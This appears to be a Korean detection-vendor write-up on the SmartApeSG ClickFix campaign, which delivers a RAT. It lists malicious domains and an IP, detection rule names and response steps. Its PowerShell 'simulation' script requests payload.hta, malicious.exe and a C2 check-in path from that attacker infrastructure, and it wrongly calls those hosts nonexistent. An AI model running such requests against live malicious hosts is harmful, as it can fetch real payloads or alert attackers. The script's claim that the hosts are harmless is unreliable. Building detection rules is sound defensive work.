SmartApeSG가 ClickFix 미끼를 통해 알 수 없는 RAT 전파
Detection stack
- AIDR
- Alert
- ETL
- Query
요약
SmartApeSG 캠페인은 사용자를 속여 가짜 CAPTCHA 또는 인간 인증 페이지를 통해 악성 명령을 실행하게 하는 ClickFix 기술을 사용합니다. 이 작업은 악성 ZIP 아카이브를 다운로드하고 추출하는 HTA 파일을 실행합니다. 최종 페이로드는 DLL 사이드-로딩을 사용하여 지속성을 확립하고 C2 인프라와 통신하는 미확인 원격 접근 트로이 목마 (RAT)입니다.
조사
조사에는 SmartApeSG 활동과 관련된 HTTPS 트래픽, PCAP 파일, 악성 아카이브의 분석이 포함되었습니다. 연구원들은 합법적인 웹사이트에 주입된 악성 자바스크립트를 식별하고 클립보드에 주입된 명령부터 최종 C2 연결까지의 감염 경로를 추적했습니다. RAT는 암호화된 트래픽을 사용하여 포트 443을 통해 외부 IP 주소와 통신하는 것으로 관찰되었습니다.
완화
조직은 알려진 악성 도메인을 차단하기 위해 웹 필터링을 사용해야 합니다, 여기에는 pewtercanto[.]top and deltaode[.]com이 포함됩니다. 사용자는 가짜 CAPTCHA 및 ClickFix 지침과 같은 사회 공학적 방법을 인식할 수 있도록 교육을 받아야 합니다. HTA 파일 실행을 제한하고 브라우저 또는 실행 명령어에 의해 시작된 의심스러운 하위 프로세스를 모니터링함으로써 위험을 줄일 수 있습니다.
응답
SmartApeSG 활동이 감지되면 영향을 받은 엔드포인트를 즉시 격리하여 C2 통신을 중단해야 합니다. 조사관은 AppData와 Documents 디렉토리를 검사하여 RAT 및 그 지속성 메커니즘을 식별해야 합니다. 엔드포인트 원격 감시 기록도 무단 HTA 실행, 클립보드 조작 및 DLL 사이드-로딩 활동에 대해 검토해야 합니다.
공격 흐름
탐지
비정상적인 최상위 도메인 (TLD) DNS 요청을 통한 의심스러운 명령 및 제어 (dns를 통해)
Proof of Value
의심스러운 환경 변수 (cmdline을 통해)
Proof of Value
HTA 파일 없이 의심스러운 Mshta 실행 (cmdline을 통해)
Proof of Value
커맨드라인의 비정상적인 최상위 도메인 (cmdline을 통해)
Proof of Value
발견 포인트 (HashSha256) 탐지: SmartApeSG ClickFix 캠페인이 미확인 RAT를 푸시함
Proof of Value
발견 포인트 (SourceIP) 탐지: SmartApeSG ClickFix 캠페인이 미확인 RAT를 푸시함
Proof of Value
발견 포인트 (DestinationIP) 탐지: SmartApeSG ClickFix 캠페인이 미확인 RAT를 푸시함
Proof of Value
SmartApeSG ClickFix 캠페인 RAT 활동 [Windows 네트워크 연결]
Proof of Value
SmartApeSG 캠페인에 의해 DLL 사이드-로딩을 통한 미확인 RAT 탐지 [Windows 파일 이벤트]
Proof of Value
시뮬레이션 실행
전제 조건: Telemetry & Baseline Pre-flight Check가 통과해야 합니다.
근거: 이 섹션은 탐지 규칙을 트리거하도록 설계된 상대 기술 (TTP)의 정확한 실행을 자세히 설명합니다. 명령어와 서술은 식별된 TTP와 직접적으로 반영되어야 하며 탐지 논리에 의해 예상되는 정확한 원격 감시 기록을 생성해야 합니다. 추상적이거나 관련이 없는 예는 오진을 초래할 것입니다.
-
공격 내러티브 & 명령어: 적수는 SmartApeSG ClickFix 캠페인을 실행 중입니다. 사용자가 악성 행동(종종 가짜 브라우저 업데이트)에 속아 넘어가면, 시스템은 악성 HTA 파일을 다운로드하려고 시도합니다. HTA는 최종 RAT 페이로드를 다운로드하기 위해 C2 인프라와의 연결을 시작합니다. 이를 시뮬레이션하기 위해, 우리는 탐지 논리에 정의된 정확한 문자열에 타격을 가하는 네트워크 요청을 생성할 것입니다:
deltaode.compo,deltaode.com/wv, 및 IP89.124.79.98. -
회귀 테스트 스크립트:
# SmartApeSG 탐지 규칙을 트리거하기 위한 시뮬레이션 스크립트 # 이 스크립트는 특정 IoC에 대한 네트워크 요청을 시뮬레이션합니다 $urls = @( "https://deltaode.compo/payload.hta", "https://deltaode.com/wv/malicious.exe", "http://89.124.79.98:443/c2_checkin" ) foreach ($url in $urls) { Write-Host "요청 시뮬레이션: $url" try { # 네트워크 원격 감시 기록을 생성하기 위해 Invoke-WebRequest 사용 # 이 도메인들은 실제로 존재하지 않기 때문에 -ErrorAction SilentlyContinue를 사용 Invoke-WebRequest -Uri $url -UseBasicParsing -ErrorAction SilentlyContinue } catch { Write-Host "요청 실패(예상된), 그러나 원격 감시 기록이 생성되었을 것입니다." } } -
정리 명령어:
# 시스템에 영구적인 변경이 없었으므로, 정리 필요 없음. Write-Host "시뮬레이션 완료. 시스템에 남아 있는 아티팩트 없음."